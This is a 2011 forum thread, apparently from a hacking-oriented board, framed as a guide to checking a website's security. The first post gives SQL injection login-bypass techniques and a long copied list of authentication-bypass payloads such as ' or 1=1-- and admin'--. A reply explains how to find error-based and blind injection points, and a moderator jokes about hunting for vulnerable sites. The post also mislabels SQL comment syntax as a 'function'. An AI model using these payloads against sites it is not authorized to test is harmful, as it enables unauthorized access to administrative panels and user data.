Change background image
  1. What's up? I see you're viewing as a Guest. How about registering, it only takes like 2 minutes. This will enable you to do more on our forum and stay updated.

How to check your website's security

Discussion in 'PC General' started by brann22, May 9, 2011.

Thread Status:
This thread is more than 180 days old.
  1. brann22

    brann22 New Member Member

    **This is intended for educational purposes only. Neither I nor newhax.com are responsible for any wrongful doings.**

    There are many ways to test your website's security; however, I will be covering only one at this time...more ways might be posted later.

    SQL Vulnerability

    This is more so a "low-level" security test. It's very simple and easy to fix.

    Go to your administrative login page (usually ending in something like admin_login.asp or admin_login.aspx). Once you're there, you can start with the most simple test, which is logging in with the username Admin'--. What does this do? In SQL, the function '-- basically means end, thus, basically, deleting the password field so all that's left is the username field. If you can gain access to your administrative panel just by doing this...then you definitely need to update your SQL.

    One more quick test you can perform is go to your administrative login page again and type Admin for the username and this time we're going to add an SQL string for the password. An SQL string is just a bunch of SQL commands someone would use to try to confuse the website, which would allow access to the administrative panel. For a simple test, first try the string 'or''='. If you can't gain access with that string, that's good! Now try something a bit more advanced, such as: ') or ('1'='1--. If you can gain access using any SQL string, you need to update your SQL.

    --An example of how the login would look like:
    Username: Admin
    Password: 'or''=' (Of course it would show as ••••••).

    Some more SQL string to try:
    admin' --
    admin' #
    admin'/*
    administrator'--
    superuser'--
    test'--

    ' union select 1, 'Eyeless', 'ez2do', 1--
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--
    ' or 1=1--
    '" or 1=1--
    ' or 0=0 --
    ' or 0=0 --'
    ' or 0=0 #
    " or 0=0 --
    " or 0=0 --'
    '" or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    " or 1=1--
    or 1=1--
    ' or a=a--'
    ' or a=a #
    ' or a=a--
    ' or "a"="a
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    hi' or 'a'='a
    hi') or ('a'='a
    hi") or ("a"="a
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a


    *Light blue means you just type it in for the username and leave the password field blank. Green means you type Admin for the username and put the SQL string in for the password.

    Hope this was helpful. More to come!
  2. Jok3r

    Jok3r MC-Admin/Summoner Member

    Cool I learned nothing at school today but I do here LoL :P
  3. vettacossx-alpha

    vettacossx-alpha Midnight Mage Member

    Somehow im less worried about vbulletin here than i was when i got wraggy at dcemu LOL i was tellin DNS about dcemus vbulletin being OUT DATED and how they wouldnt have got hit a 6th time had they updated the vbulletin :P

    http://ps3endusers.blogspot.com/p/hacker-manifesto.html

    Aint that just about a bitch lol
    [​IMG]
  4. brann22

    brann22 New Member Member

    Yea, I would think dns would have this stuff pretty much up-to-date, which makes it (practically) completely safe. You used to be able to use SQL Injection (inserting certain words/phrases into the actual URL of a forum and other alike sites) to get people's login info...most of that has been taken care of by now, though. :P
  5. Nuke547

    Nuke547 Junior Member Member

    cool post,
    i wonder if i could get away with that at newhax :p
  6. 3nvisi0n

    3nvisi0n The R3v0lu710n Super-Mod

    no you likely wouldn't get away with it, I also don't see the point in the big list, all you really need to check is for its escaping... so try the characters ` ' " -- # /* \ if you get mysql error it is a sql injection point. If you don't get an error but know something went wrong, it is a blind sql injection. If nothing happens no point in trying anything else because it isn't vuln. And you can do A LOT more with SQL Injects(what that list is doing) than just user/pass stuff.

    EDIT: Also give credit where its due this list is all over the internet not your own. Also it is not a low-level test, its the interface its pretty high-level and the issue itself is a high-level forming of the query.
  7. Daddy

    Daddy New Member Member

    This will come in handy I was thinking about creating my own blog site
  8. Crazy52

    Crazy52 Gate Keeper Admin

    lol now to look for some sites that have been dead since about 2004
Thread Status:
This thread is more than 180 days old.

Share This Page